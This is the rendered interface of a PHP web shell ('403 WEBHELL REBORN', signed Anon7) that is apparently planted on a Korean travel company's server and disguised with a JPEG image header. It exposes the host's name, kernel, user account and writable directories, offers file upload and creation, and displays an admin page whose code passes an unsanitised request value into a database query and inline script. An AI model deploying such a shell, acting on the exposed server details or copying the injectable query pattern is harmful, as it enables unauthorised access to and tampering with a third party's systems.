ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/toadmin/good_en/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/toadmin/good_en/good_date.html
<?
include "../include/top.html";
include "_common.php";

// 상품정보
$arr = good_list(" and g_uid='{$g_uid}' ");
$row = $arr[0];

// 행사구분
$data_date_type = good_date_type($g_uid,"","N","Y");
$dtid_s = $data_date_type[0]['dtid'];
?>
<div class="contents_wrap">
	<div class="contents_wrap_in">
		<div class="title"><?=$row['g_title']?><span class="arrow">&gt;</span><strong>행사관리</strong></div>
		<div class="contents_detail">
		<div id="Content_box">
				<!-- 본문 -->
				<?
					include "_menu.html";
				?>
					<!-- 행사명 목록 -->
					<div  id="ajax_date_type"></div>
					<!-- /행사명 목록 -->
					<!-- 행사달력 -->
					<div id="ajax_start_date"></div>
					<!-- /행사달력 -->
				<!-- /본문 -->
			</div>
		</div>
	</div>
</div>

<script type="text/javascript">
$(document).ready(function(){
	// 행사메뉴
	ajax_post('ajax_date_type','good_date_type_list.html?g_uid=<?=$g_uid?>&dtid_s=<?=$dtid_s?>');

	// 행사목록
	ajax_post('ajax_start_date','good_date_list_ajax.html?g_uid=<?=$g_uid?>&dtid=<?=$dtid_s?>');
});

</script>
<?
include "../include/footer.html";
?>

Anon7 - 2021